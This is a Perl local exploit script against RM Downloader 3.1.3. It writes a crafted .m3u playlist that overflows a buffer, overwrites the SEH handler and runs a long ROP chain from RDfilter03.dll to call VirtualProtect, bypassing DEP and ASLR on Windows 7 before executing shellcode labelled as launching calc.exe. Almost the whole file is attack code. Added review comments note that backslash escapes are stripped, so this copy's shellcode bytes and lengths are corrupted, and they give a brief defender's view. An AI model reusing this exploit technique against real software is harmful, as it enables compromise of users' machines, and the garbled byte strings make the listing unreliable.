
# Title : RM Downloader 3.1.3 Local SEH Exploit (Win7 ASLR and DEP Bypass)
# Published : 2010-07-01
# Author : Node


#!/usr/bin/perl
# Exploit Title:	RM Downloader 3.1.3 Local SEH Exploit (Win7 ASLR and DEP Bypass)
# Date:			July 1, 2010
# Author:		Node
# Software Link: 	http://www.mini-stream.net/downloads/RMDownloader.exe
# Version:		RM Downloader 3.1.3.3.2010.06.26 (Evaluation)
# Tested on:		Windows 7 Ultimate x64 ENG
# Notes: 		Only using rop gadgets from RDfilter03.dll (432KB). 
#			Using exploit from MadjiX and inspiration from corelanc0d3r.
# Code :
# Builds one crafted .m3u playlist and appends it to RMdownloader.m3u.
# File layout, in order (see the length arithmetic further down):
#   $header . $pre (16240 bytes of filler) . $rop (a chain of addresses
#   inside RDfilter03.dll) . $space (filler up to 43492 bytes) . $seh
#   (the handler overwrite) . $nops . $shellcode . $end (trailing filler).
# NOTE(review): nothing but the shebang precedes this code, so the file
# runs without `use strict; use warnings;`; the numeric-context and
# bareword-handle issues flagged below are therefore never reported.
# NOTE(review): backslash escapes appear to have been stripped from this
# listing -- "#EXTM3Un", "x90" and the shellcode bytes read as literal
# letters here -- so the byte values and lengths this copy produces differ
# from what the author's comments describe; compare with the original.
# Defender's view: the overflow this relies on is presumably an overlong
# playlist entry copied into a fixed-size buffer (confirm against the
# parser); the resulting file is tens of kilobytes of repeated filler
# followed by little-endian module addresses, which a playlist scanner or
# fuzzing harness can flag cheaply.
my $header = "#EXTM3Un";
my $pre = "A" x 16240;
# Gadget chain. Each pack('V', ...) is a little-endian address in
# RDfilter03.dll; the "A" x N runs are stack slots consumed by the POPs /
# ADD ESPs in the preceding gadget (the author's comments give the gadget).
my $rop = pack('V',0x10048875); # PUSH ESP # MOV EAX,1 # POP EBX # ADD ESP,8
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x10023405); # ADD ESP,20
# The next five slots are the call frame the chain later fills in.
$rop = $rop."1111"; # VirtualProtect() placeholder
$rop = $rop."2222"; #return address placeholder
$rop = $rop."3333"; #lpAddress placeholder
$rop = $rop."4444"; #dwsize placeholder
$rop = $rop."5555"; #flNewProtect placeholder
$rop = $rop.pack('V',0x10051005); # lpflOldProtect writable address
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x10011F55); # MOV EAX,EBX # POP EBP # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x10012701); # POP EBX # POP ECX
$rop = $rop."A" x 4;
$rop = $rop.pack('V',0xffffffff);
$rop = $rop.pack('V',0x10040674); # PUSH EAX # POP ESI # POP EBP # MOV EAX,DWORD PTR DS:[ECX+EAX+2] # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1001229B); # PUSH ESI # ADD AL,5E # POP EBX
$rop = $rop.pack('V',0x10011F55); # MOV EAX,EBX # POP EBP # POP EBX
$rop = $rop."A" x 8;
# Long arithmetic runs: the same gadget repeated N times (the `x N` on the
# packed address) stands in for an immediate add/sub the DLL has no gadget for.
$rop = $rop.pack('V',0x1002CF10) x 11; # ADD EAX,80BF(32959) # ADD DH,DH
$rop = $rop.pack('V',0x100422FB) x 272; # ADD EAX,20
$rop = $rop.pack('V',0x10016DA7) x 7; # INC EAX
$rop = $rop.pack('V',0x10028069); # MOV EAX,DWORD PTR DS:[EAX]
$rop = $rop.pack('V',0x10046F47) x 395; # DEC EAX
$rop = $rop.pack('V',0x1002CCD7) x 12; # INC ESI # ADD AL,3
$rop = $rop.pack('V',0x10037288) x 12; # SUB AL,3
$rop = $rop.pack('V',0x1001C707); # ADD ESP,8 # MOV DWORD PTR DS:[ESI],EAX # MOV EAX,ESI # POP ESI
$rop = $rop."A" x 12;
# The four groups below repeat the same store pattern as lines above,
# each writing one value into the next placeholder slot.
$rop = $rop.pack('V',0x10040674); # PUSH EAX # POP ESI # POP EBP # MOV EAX,DWORD PTR DS:[ECX+EAX+2] # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1001229B); # PUSH ESI # ADD AL,5E # POP EBX
$rop = $rop.pack('V',0x10011F55); # MOV EAX,EBX # POP EBP # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1002CF10); # ADD EAX,80BF(32959) # ADD DH,DH
$rop = $rop.pack('V',0x1002CCD7) x 4; # INC ESI # ADD AL,3
$rop = $rop.pack('V',0x10037288) x 4; # SUB AL,3
$rop = $rop.pack('V',0x1001C707); # ADD ESP,8 # MOV DWORD PTR DS:[ESI],EAX # MOV EAX,ESI # POP ESI
$rop = $rop."A" x 12;
$rop = $rop.pack('V',0x10040674); # PUSH EAX # POP ESI # POP EBP # MOV EAX,DWORD PTR DS:[ECX+EAX+2] # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1001229B); # PUSH ESI # ADD AL,5E # POP EBX
$rop = $rop.pack('V',0x10011F55); # MOV EAX,EBX # POP EBP # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1002CF10); # ADD EAX,80BF(32959) # ADD DH,DH
$rop = $rop.pack('V',0x1002CCD7) x 4; # INC ESI # ADD AL,3
$rop = $rop.pack('V',0x10037288) x 4; # SUB AL,3
$rop = $rop.pack('V',0x1001C707); # ADD ESP,8 # MOV DWORD PTR DS:[ESI],EAX # MOV EAX,ESI # POP ESI
$rop = $rop."A" x 12;
$rop = $rop.pack('V',0x10040674); # PUSH EAX # POP ESI # POP EBP # MOV EAX,DWORD PTR DS:[ECX+EAX+2] # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1001229B); # PUSH ESI # ADD AL,5E # POP EBX
$rop = $rop.pack('V',0x10011F55); # MOV EAX,EBX # POP EBP # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1001011B); # XOR EAX,EAX
$rop = $rop.pack('V',0x10031DAC); # ADD EAX,100 # POP EBP
$rop = $rop."A" x 4;
$rop = $rop.pack('V',0x10031DAC); # ADD EAX,100 # POP EBP
$rop = $rop."A" x 4;
$rop = $rop.pack('V',0x10031DAC); # ADD EAX,100 # POP EBP
$rop = $rop."A" x 4;
$rop = $rop.pack('V',0x1002CCD7) x 4; # INC ESI # ADD AL,3
$rop = $rop.pack('V',0x10037288) x 4; # SUB AL,3
$rop = $rop.pack('V',0x1001C707); # ADD ESP,8 # MOV DWORD PTR DS:[ESI],EAX # MOV EAX,ESI # POP ESI
$rop = $rop."A" x 12;
$rop = $rop.pack('V',0x10040674); # PUSH EAX # POP ESI # POP EBP # MOV EAX,DWORD PTR DS:[ECX+EAX+2] # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1001229B); # PUSH ESI # ADD AL,5E # POP EBX
$rop = $rop.pack('V',0x10011F55); # MOV EAX,EBX # POP EBP # POP EBX
$rop = $rop."A" x 8;
$rop = $rop.pack('V',0x1001011B); # XOR EAX,EAX
$rop = $rop.pack('V',0x100422FB) x 2; # ADD EAX,20
$rop = $rop.pack('V',0x1002CCD7) x 4; # INC ESI # ADD AL,3
$rop = $rop.pack('V',0x10037288) x 4; # SUB AL,3
$rop = $rop.pack('V',0x1001C707); # ADD ESP,8 # MOV DWORD PTR DS:[ESI],EAX # MOV EAX,ESI # POP ESI
$rop = $rop."A" x 12;
$rop = $rop.pack('V',0x10046F47) x 16; # DEC EAX
$rop = $rop.pack('V',0x1002FF96); # XCHG EAX,ESP
# Filler sized so that $pre . $rop . $space is exactly 43492 bytes; $seh is
# written immediately after it. Note this is real length() arithmetic,
# unlike the $end computation below.
my $space= "A" x (43492 - length($pre) - length($rop));
my $seh=pack('V',0x10017928);  #ADD ESP,4404
# 5732 repeats of the NOP literal (see the escape note at the top).
my $nops = "x90" x 5732;
my $shellcode =
"xb8x7bx39xebx12x29xc9xb1x33xd9xe1xd9x74x24" .
"xf4x5bx31x43x0fx83xebxfcx03x43x70xdbx1exee" .
"x6ex92xe1x0fx6exc5x68xeax5fxd7x0fx7excdxe7" .
"x44xd2xfdx8cx09xc7x76xe0x85xe8x3fx4fxf0xc7" .
"xc0x61x3cx8bx02xe3xc0xd6x56xc3xf9x18xabx02" .
"x3dx44x43x56x96x02xf1x47x93x57xc9x66x73xdc" .
"x71x11xf6x23x05xabxf9x73xb5xa0xb2x6bxbexef" .
"x62x8dx13xecx5fxc4x18xc7x14xd7xc8x19xd4xe9" .
"x34xf5xebxc5xb9x07x2bxe1x21x72x47x11xdcx85" .
"x9cx6bx3ax03x01xcbxc9xb3xe1xedx1ex25x61xe1" .
"xebx21x2dxe6xeaxe6x45x12x67x09x8ax92x33x2e" .
"x0exfexe0x4fx17x5ax47x6fx47x02x38xd5x03xa1" .
"x2dx6fx4exacxb0xfdxf4x89xb2xfdxf6xb9xdaxcc" .
"x7dx56x9dxd0x57x12x51x9bxfax33xf9x42x6fx06" .
"x64x75x45x45x90xf6x6cx36x67xe6x04x33x2cxa0" .
"xf5x49x3dx45xfaxfex3ex4cx99x61xacx0cx70x07" .
"x54xb6x8cxcd"; #Calc.exe
# NOTE(review): $nops is a string, so in numeric context it evaluates to 0
# (an "isn't numeric" warning under `use warnings`) and the trailer is
# always 20000 repeats; this is inconsistent with the length() arithmetic
# used for $space above.
my $end= "x90" x (20000 - $nops);
# NOTE(review): 2-arg open with a bareword handle and no error check, and
# the '>>' mode appends, so every run grows RMdownloader.m3u by another
# full payload instead of replacing it.
open(MYFILE,'>>RMdownloader.m3u');
print MYFILE $header.$pre.$rop.$space.$seh.$nops.$shellcode.$end;
# Buffered write failures would only surface here, and close is unchecked.
close(MYFILE);